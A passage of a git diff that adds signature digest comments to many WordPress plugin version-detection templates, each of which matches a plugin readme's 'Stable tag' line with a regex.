b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063c8384154319fcd6d4d595cb90bec189e1193e06e805fdec2b5d98aa37b9274022100e93b20b1a583929eb22d11a678116cf25feedf7258b4b43ecf360ed03fbfc3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..68e4b2497e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009bb435ef37de924bac4076316a10166dacf72edd3f46e17c0122cdb4ec5ecac902201ca7d821fa1753d3e0f6ef772f254ce3c06ae45d2e8ce3b21d5415b4b188b444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..7e4da9eae1 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5118d2e4dcb34e6dbe43781da9da7115654725300df9ad78dff6e10ec050b410220372e010f69ebef56e12b7ed8d17a0441c961548dbd338a30b2d8fecd1783cfec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..ea6a98de11 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a70f4ddb326e0cf5d04f645315c8b3d957d674848ed19c56c8cee3159f71979d022044e756f79911dc55daa7dfb6ffa0437bc7c4621c788814ed95dc348fd2e97ecb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..453798c2c9 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aff334823880af03cabdce9d179e83bf095d24a61f39eb32574e09159fc0873402202d0e507a40d2304a8babfcefd1cc46753c3364592ac4156c363d2bbc80a54b8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..1574d8b628 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed69c87738ff54382126ab89bbe8022bb2f9066d9f0e290a2c35f2db47f4baf602201577632e91003d34e734ed9e5c06039bbea6f0eb55d21c25cfa91bdf947a2cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..908bfe0542 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100beb131fd1d2b873d2dbf7ac786d891e9d2c8474d0f1c20292a4eebfc870dd8b202203d6adc494d9c4e26474e642bfb305a8118de447f7ef41ffb850220f861a7962c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..0c3f15abd4 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7a2f2dc764cc8544d5c47cf8977054dc3e0e192154f8b681cb29573cc6ab42902201e80f88d7b7db635f68ef1d770c249dd06a11fe9f909b466138f5d0ae51283ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..2e24c8fe64 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6d49796ef01c2e7b40e4c21ebce8fdb1f8f4eb5dee515a1a0b812016cb64810022069de640da3596cb11da5924d37cbef672d5d9f3e82286aaab60244ef4d730111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..51c0b1f628 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100afca5ebad3c03fad66fb0eecf7ef04141a06361edf7cdf96ecab71726dfe95bb02203c31229b9d50540dec538ce5d0205a0963979da444ac47538d28bc270d49a286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..ace4b65857 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c69dc9beca44596b284cca3163fe4668ca8260978214116b8d2600bffe9f84f7022100df5ece11265548e3aa8e3e6a1ba26b6ae6ab8630068165bd7d6b0282ec8158bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..e650383692 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080b638b34f536da0a1166ceaf082bd231b15dc3462bea9c1de776d8ecef25ce1022067fb3db4a669f25688387ce33f172d62edf479cf73fa90f69345ea84b4bdc171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..f010cddb3a 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f5687cb227e3fb66c81573e44e549a1f74bd53f8cad8138c9a128c5ee4196f2022100d2219cd9a75b2555120792139b94d57867599a30f3fd86c9cb42244e833e1220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..306ee63727 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022062900d2371dc2325944b274698d8fbb044f3a2a834d9dad79fdbf5134212c48b022100c991f729e66eb3dc35698d631d29da59ae480de901234ba1c0c6e031b057a6a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..40163c776d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022038dc74d49c38fce238745a206d3e0901f9bc3333d55a9bb69fc114c8152cc986022100bb3c28a8cb97fd3d352d5efd0ce0d73d46b08f0c462ef1931da81ed665588895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..c6903e0607 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cd01be77d1705bfd3d85ffeb1c924885be20e59a3c294cbdf7f628aec6a4f2ff0220576f4390391e3d6ea42e560ab2bcbfd885a84799533881506f0a972d92cfca88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..19dc252cae 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c01592a2dcb52623c66711a9de19bcb2d66f4557752d0c1f012256d5894b02f1022100967b80cfc353da6f58b3103d7d9f157506b15b4a4eb7939bbcbf509a7f989053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..d57e4ca29d 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc3cc393241e79731e89f61b66a9cc5a6fb51b0cfd5d8c7d83cd5ad07113863b022100ee08a4c573e21dc6b9bc9af0feb2098088e8f9c8913fc6d71a180c2a39b34495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..ee18f86429 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b6de6a51e2984a33fab7c34ce2770621af6a43f2144a6eeba1d8929672f7f340221009295c0cc91a54b2d802e0996c3c4b6e5a14006b22d2de18554c288b03756b127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..80a72a0b98 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220658baef645e032b3e38fb9668a101de2b8605d871a4f5084f02db9d4efffb03a02207e0362835a96aa05d693544b2c64bc8c731399b80ebb61ca0542b901630b4b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..803726a1d6 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eae22499704059fe18dd0c66f47993edae1064c02e0019ce909bbc1fd5ea51b3022100d6901d710f10cd5c57bd63dd64f6a9fc661e6c092efaa613bbb310b15d8a45f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..e4b313f8e5 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5266936c3368e7e4f09645618d439bcf81b6b1a1ac49ffedd285d7e8394439a02205023836cff8a2d56faa4c42e920c3cf7e9786ec3e7e7d96856c14e3a150494bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..df74faf508 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008474e1d69abed375c58117af304f022d6795404626ea1e769d290bdb2d93aef9022100cddaccf430738038c5950f6249f3a1000134e85fbcf6abc9edbc356b180b04a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..0502e03b8e 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e67d19ce3df6924c2eed31cca3719bbbb53bbfa97a9675e89b9aa0f6cb0dd3102207676c215eccb143cacc798b74ae5ac3894461d367faa4c0652574d7e6064c092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..ab1f4a2e06 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c0e2e039760a8bf85d47af06569580c7ada44c6bcf9a532619daac0e8aa9805022100f9e7a4a53f3f875d5f5c307db7ea13734e12b1b63e02a2267b291935d35776d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..c22e97b22f 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051855aa3e0bef2dfc289751a2a8656ab141ef4671ba0db33845d08e313c6ab1902200e64a191dd4630f4397d7b0c4bf61acf6da6a887d46a157e8643395628566f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..f2fa1bde3f 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200433bb8696505271917dcb1ea1671b079ac05d40908d0828b31b4207a4a4733b02202ed0a86e20bb4aedd0987e76a6239011591b6bcd67535369fdfba4ba7afe5f28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..29fda87b15 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202937f9708172b6a6252dceaa3c4e47b67ca7e1b299a7653a669f8022a08f5fda022034f8a7e0fcb92c4799627682c0ca5e60d2d1713ca7ac2f435be969b9ccd77947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..2332e52f19 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220085feeb2b10487f7e9ae90d1941ebff7a26360be632b07da5d4603724a57bf72022100d5d68eaf9223f6bae1102995842440e66a744bab74f3f439e17b2117fdec845e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..0bdab5b743 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220776252df3f6e59b390975c15770fefe717337c158308b87d14b7a642f55e608202201111d1e004b77278561caad0d5e6dcb025c1e0bfe2b1c949f5d894f1739bd989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..9097998e16 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c1950513d3735824d0f8ebbdf7c0cd96ecf2acb184f982fa6541fa491a2d0064022014f36fd90a87e8ea938aafd64bfde7ab8200138e1978cd8ad99213355b25876d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..80f675a623 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d809130eb113bbbc71f5b983137eb47a295b8d01a9e5df534b04abe20d7e0b330220723c33969b9c02aca4a3f066e2e7230569fda20540461439390c2b9ba1bb7665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..f1ca0bbfa9 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220540e166c41d2bc2be57b847c482d90d70e3a75917b2a595770af83bcf278b8b402201687dab9e77e4b5e16af34da41e742a459a03ece759191722e8967108d0936a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..4bb00d533a 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084077b21e35efb04fdd807dbbba13f3ba6180d98a4b16ad3b67b918ae0b1195b022100e60a34d3b5e15ed2149b495bccd8c5affe01a5a6836b45c7f093cb388e1d8554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..91a1921213 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d9cf69ee5e4940000f3fb3f59946e794058ae8db29f7a44643c2896b4cc7a3d602204359a385e41ac38cd6aeabc096607eb3b363b71499b1d164628d5ec266ea0376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..5baec70b50 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220775dd2a3275b47b27e82742f49ff6d074c0a8416afa2e6ef27350f5f6d497d71022071d2fe68038e14c91e62aaaf3fc6b293b4b787e91d41979af4661ecca113f7f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..b45fdf054a 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e8791a4a0014db79fd98155d8ccf72359d1cdcb77d3f8bb4b600c3c6d92faaf0221009f4c20298b622cb75e3adfce4452fbfc1f74789a612024a1742678f84d50ada2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..7ef0428035 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210094c3c2bee463ebf9ab7876857209202e498ade24872b7add7d4e3f6018c5f059022100ecf3d4e841a55c6a6fbd88ac5b46ba97a84b63c1702a6856f6f3ea49b72b03b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..5c14227603 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bc9e7bf2f93c1e24f031ce37dd922734dfd1abdb303fc22409de1375c7dee17c02202cf8968762f12b3c6180b80a337ff6091446cf61e90a528cdddb2a1ba3833332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..2db5885123 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf2f33630f761b949751b300fa48d54764e486e03c4092f7931bd487b63e900102203ed05464ef595e9b58d3571adab92744efb499a91bf5e5ca3419a3e58bb42807:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..4f746c76b9 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d2bffd61706377b9af5cf30e22605892993c34cb7798f0f845a709c3a545da602207807973921b3779c2efef6ca89c0b9879578fc6f8ec8fa8029ffaadf6239da18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..ab9dfa7210 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204bdbabaff82d3f139c23a58e36c016f77971182daa0686dea0941c56e8d45d2f022074f557d73df4bc3d23a61adf204fbf88a118395c8e2568141512bcbb19507030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..931f01eb1e 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210096eb0ba2c3c4a08c7c6d82b1fc606d3abae947928bf8c3d383cb2b65124235d2022005c4f971d4cbe42fb4b8ad6bd7dbca0389c5c169a8876b0f78e0fafceb065a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..1099073c22 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a6ecbb95bc67733a845ecb8c8fc45ba33e98d30717440b54b5667a4103597b57022100a681567713da1987ff10ba0557ba023636b7029911b65c33c70ae1a274a6ca84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..4aa7a1a718 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c009a771ec1cc4ce22d5692af026ca8a8ba1d4b5bbac7f3a477b4c4d4c8c8089022058906a8a993c796cc6447fec77961b31ee24e99ced08d035d77e235afd0b27e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..78b073dda7 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078a855125572791da6d81450604e10c16d03678c2a4d4ec32bd7bccbe6d81a04022074d69bbedaf282cac72fed4b76919338518f0b1a9a70d1746178028e451d12eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..08bd12f036 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203451cc6eae91b6420f59926170a138cf56cfc62f1a31eb09441230453623e2f102201d219df85b3d1949a38cabcaa63cf8680399bc3e4182299c399abd7672d78481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..935b025592 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - 